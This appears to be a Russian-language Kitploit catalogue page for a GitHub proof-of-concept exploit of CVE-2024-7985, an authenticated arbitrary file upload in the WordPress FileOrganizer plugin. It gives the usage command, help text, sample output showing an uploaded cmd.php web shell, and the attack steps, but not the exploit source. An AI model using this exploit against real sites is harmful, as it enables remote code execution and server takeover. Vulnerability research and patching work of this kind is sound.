Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-7985-PoC — FileOrganizer <= 1.0.9 - Аутентифицированная (подписчик+) произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-7985-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-7985-poc

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - Аутентифицированная (подписчик+) произвольная загрузка файлов

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - Аутентифицированная (Subscriber+) произвольная загрузка файлов

Эксплойт FileOrganizer - CVE-2024-7985

📌 Обзор

CVE-2024-7985 - плагин WordPress FileOrganizer <= 1.0.9 уязвим для аутентифицированной произвольной загрузки файлов, что позволяет злоумышленникам с правами Subscriber+ загружать и выполнять вредоносные файлы удаленно. Эта уязвимость возникает из-за отсутствия проверки типа файла в функции fileorganizer_ajax_handler, что делает возможным удаленное выполнение кода (RCE).

🚨 Этот эксплойт позволяет злоумышленникам выполнять произвольные команды на сервере! 🚨

⚡ Особенности

  • ✅ Автоматизирует атаку - вход, получение nonce, эксплуатация.
  • ✅ Обходит проверки безопасности за счет использования привилегий аутентифицированного пользователя.
  • ✅ Автоматическое определение версии - проверяет, уязвима ли цель.
  • ✅ Выполнение пользовательских команд - пользователь может указать любую команду.
  • ✅ Беспроблемно обрабатывает проблемы с SSL-сертификатами.

🛠️ Требования

  • Python 3
  • requests
  • beautifulsoup4

Установка зависимостей:

pip install requests beautifulsoup4

🚀 Использование

python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"

📖 Использование - справка

usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi

options:
  -h, --help           show this help message and exit
  --url URL            Target WordPress site URL
  --username USERNAME  WordPress Username
  --password PASSWORD  WordPress Password
  --cmd CMD            Command to execute in uploaded file

Пример вывода:

[+] Обнаружена уязвимая версия: 1.0.9
[+] Успешный вход в систему!
[+] Извлечен nonce: 7b4a95872b
[+] Файл успешно загружен!
[+] Доступ к файлу по адресу: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami

🔍 Схема работы эксплойта

1️⃣ Проверка версии - Определяет, уязвим ли сайт.
2️⃣ Аутентификация - Вход в WordPress.
3️⃣ Извлечение nonce - Получение токена безопасности.
4️⃣ Загрузка файла - Загрузка вредоносного PHP-скрипта.
5️⃣ Выполнение команды - Выполнение указанных пользователем команд.


📌 Отказ от ответственности

Этот скрипт предназначен только для образовательных целей; автор не несет ответственности за любое неправомерное использование или последствия. 🚨

Скачать инструмент